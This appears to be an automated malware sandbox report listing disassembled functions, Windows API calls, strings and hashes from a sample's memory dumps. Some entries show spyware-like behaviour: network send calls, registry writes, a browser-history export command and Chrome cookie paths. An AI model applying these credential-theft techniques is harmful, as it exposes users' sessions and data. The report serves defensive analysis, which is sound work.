Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A

Function 02178500 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,0216BEEE,00000000,?,?,0216BF72,00000000,00000000,00000000,00000000,00000000,?,?), ref: 02178505
_free.LIBCMT ref: 0217853A
_free.LIBCMT ref: 02178561
SetLastError.KERNEL32(00000000), ref: 0217856E
SetLastError.KERNEL32(00000000), ref: 02178577

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction ID: bac4c64c03ab98cfefcf21254f91aa76ee19c3abdfd08c6237f5710fc920e60f
Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction Fuzzy Hash: D00144366C4B007F831636386C4CE2A263FDBC6776F234428F819E21A0EF64CD01A464

Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
_free.LIBCMT ref: 004482D3
_free.LIBCMT ref: 004482FA
SetLastError.KERNEL32(00000000), ref: 00448307
SetLastError.KERNEL32(00000000), ref: 00448310

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D

Function 0214C444 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0214C45C
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0214C46F
GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0214C48F
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0214C49A
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0214C4A2

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpen$FileImageName
String ID:
API String ID: 2951400881-0
Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
Instruction ID: c621c5b0079e02b0ebf24f05abf04efc2772831c9ab46e1d7ab734700b19edb1
Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
Instruction Fuzzy Hash: E7014935281314ABD62097A89C49F77B27CDB84B92F404163F94DC21D1FF608D41C6B5

Function 0041C1DD Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpen$FileImageName
String ID:
API String ID: 2951400881-0
Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679

Function 02180C23 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 02180C3B

Part of subcall function 021769E9: HeapFree.KERNEL32(00000000,00000000,?,02180ED6,?,00000000,?,00000000,?,0218117A,?,00000007,?,?,021816C5,?), ref: 021769FF
Part of subcall function 021769E9: GetLastError.KERNEL32(?,?,02180ED6,?,00000000,?,00000000,?,0218117A,?,00000007,?,?,021816C5,?,?), ref: 02176A11

_free.LIBCMT ref: 02180C4D
_free.LIBCMT ref: 02180C5F
_free.LIBCMT ref: 02180C71
_free.LIBCMT ref: 02180C83

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction ID: 68412bdb07d515c3bd2edba9bf2dbdc4d4a2226e6d8c50e0391b229e78e04542
Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction Fuzzy Hash: 1EF0FF33555648AF8624EF58F9C7C1673EEEB4C7247A84859F249DB510C730FC848E58

Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004509D4

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 004509E6
_free.LIBCMT ref: 004509F8
_free.LIBCMT ref: 00450A0A
_free.LIBCMT ref: 00450A1C

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C

Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00444066

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00444078
_free.LIBCMT ref: 0044408B
_free.LIBCMT ref: 0044409C
_free.LIBCMT ref: 004440AD

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF

Function 0217BC9E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

PkGNG, xrefs: 0217BCA0

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
Instruction ID: c5da2657e12cb6cdbef42bf487fe5eeb3ff713c51c008a81b0742d658e488872
Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
Instruction Fuzzy Hash: 3851E571D88209AFDF14DFA4C844BEEBBB9EF8931CF150159E514A7290DB719B01CB61

Function 0044BA37 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

PkGNG, xrefs: 0044BA39

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9

Function 0217E950 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0217E99F
_free.LIBCMT ref: 0217EABC

Part of subcall function 0216BF80: IsProcessorFeaturePresent.KERNEL32(00000017,0216BF52,?,?,?,?,?,00000000,?,?,0216BF72,00000000,00000000,00000000,00000000,00000000), ref: 0216BF82
Part of subcall function 0216BF80: GetCurrentProcess.KERNEL32(C0000417), ref: 0216BFA4
Part of subcall function 0216BF80: TerminateProcess.KERNEL32(00000000), ref: 0216BFAB

Strings

*?, xrefs: 0217E993
., xrefs: 0217EC73

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction ID: e9bd76e7dfa9ba68830f024ad44643c54d3321846687443945524610285c3bca
Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction Fuzzy Hash: F1516176E40219AFDF14DFA8C880AADBBF5FF88314F2581A9E855E7340E7759A018F50

Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044E738
_free.LIBCMT ref: 0044E855

Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44

Strings

*?, xrefs: 0044E72C
., xrefs: 0044EA0C

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54

Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00415B0F
GetTickCount.KERNEL32 ref: 00415B86

Strings

NG, xrefs: 00415B3E
!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID: !D@$NG
API String ID: 180926312-2721294649
Opcode ID: d0b67efa6430cabaaa61ef051932a4bf0caaa6a106d457a50181d38c8964e71c
Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
Opcode Fuzzy Hash: d0b67efa6430cabaaa61ef051932a4bf0caaa6a106d457a50181d38c8964e71c
Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A

Function 0213A10A Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(?), ref: 0213A13A

Part of subcall function 02134B2F: connect.WS2_32(FFFFFFFF,00000000,00000000), ref: 02134B47

Part of subcall function 0214C77C: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,0213A1C2,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0214C791

Part of subcall function 02134D08: send.WS2_32(?,00000000,00000000,00000000), ref: 02134D9D

Strings

XQG, xrefs: 0213A1AF
NG, xrefs: 0213A19A
PG, xrefs: 0213A165

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CreateFileKeyboardLayoutNameconnectsend
String ID: XQG$NG$PG
API String ID: 1634807452-3565412412
Opcode ID: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
Instruction ID: 0cc4429d3b24dfc41dc1d9caa5ea1347306a4bfb3a0df3c37af279e1897f1251
Opcode Fuzzy Hash: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
Instruction Fuzzy Hash: 905102316882805FC32AFB34EC50AEF7397BFA4350F50492DA58A87194EF745E49CE55

Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3

Strings

`#D, xrefs: 00442400
`#D, xrefs: 004424ED

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: `#D$`#D
API String ID: 885266447-2450397995
Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44

Function 021476FC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,00466108,0046C7B0,00000000,00000000,00000000), ref: 0214775C

Part of subcall function 0214C6EC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02134396,00465E74), ref: 0214C705

Sleep.KERNEL32(00000064), ref: 02147788
DeleteFileW.KERNEL32(00000000), ref: 021477BC

Strings

/t , xrefs: 0214773B

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t
API String ID: 1462127192-3161277685
Opcode ID: f3cc2bf311b2e903670e8554ba4cfbbef14b6752626a17aa89a733d663d9b0ca
Instruction ID: f054f29d2323953850b1da3d1f455f60866f7b007ee6c1477545cd31cb5b2b89
Opcode Fuzzy Hash: f3cc2bf311b2e903670e8554ba4cfbbef14b6752626a17aa89a733d663d9b0ca
Instruction Fuzzy Hash: AC313031980219AEDB16FBA0DC95EFE773BAF14711F400165E90A671D0EF305E8ACE98

Function 0217BA86 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0217BDE5,?,00000000,FF8BC35D), ref: 0217BB39
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0217BB67
GetLastError.KERNEL32 ref: 0217BB98

Strings

PkGNG, xrefs: 0217BA88

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: PkGNG
API String ID: 2456169464-263838557
Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
Instruction ID: 4758da07580899c8fb17a093d8dd6d7a74450b3511b9686de7c24ce7dc002c37
Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
Instruction Fuzzy Hash: 4B317271A40219AFCB24CF59DC909EAB7B9EB48315F4444BDE909D7250D730AE80CF60

Function 0044B81F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
GetLastError.KERNEL32 ref: 0044B931

Strings

PkGNG, xrefs: 0044B821

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: PkGNG
API String ID: 2456169464-263838557
Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4

Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

Sleep.KERNEL32(000000FA,00465E74), ref: 00404138

Strings

/sort "Visit Time" /stext ", xrefs: 004040B2
0NG, xrefs: 00404097

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "$0NG
API String ID: 368326130-3219657780
Opcode ID: 55d7e25f97021cbccf0bf68c9153b3e2d165b92eae16c5a62e719093376332a6
Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
Opcode Fuzzy Hash: 55d7e25f97021cbccf0bf68c9153b3e2d165b92eae16c5a62e719093376332a6
Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99

Function 00403850 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 00403857

Strings

NG, xrefs: 00403852
NG, xrefs: 0040385C, 0040386E, 00403864, 00403872
NG, xrefs: 00403860

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID: NG$NG$NG
API String ID: 10892065-3467659310
Opcode ID: fda52f7bc80fc6a446c2dcee00afa6783bca3e489e25c70a0a5b8d9c2ac6896c
Instruction ID: 19f55b3a21f6484370d4273dfc3e00692b712215858ff17712a8b7bf0d816298
Opcode Fuzzy Hash: fda52f7bc80fc6a446c2dcee00afa6783bca3e489e25c70a0a5b8d9c2ac6896c
Instruction Fuzzy Hash: AB11F6B2B002005BCA14BEA68C9992F764E9FC1744F00047EF401773E2CDBD9D0583A9

Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004162F5

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB

Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD

Strings

okmode, xrefs: 0041630F
!D@, xrefs: 00417089
PG, xrefs: 00416322

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _wcslen$CloseCreateValue
String ID: !D@$okmode$PG
API String ID: 3411444782-3370592832
Opcode ID: 20472b630c2e9a214d0946817012e82eaee51e571843e51ded5197045f46d6a7
Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
Opcode Fuzzy Hash: 20472b630c2e9a214d0946817012e82eaee51e571843e51ded5197045f46d6a7
Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D

Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6

PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688

Strings

User Data\Profile ?\Network\Cookies, xrefs: 0040C635
User Data\Default\Network\Cookies, xrefs: 0040C603

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

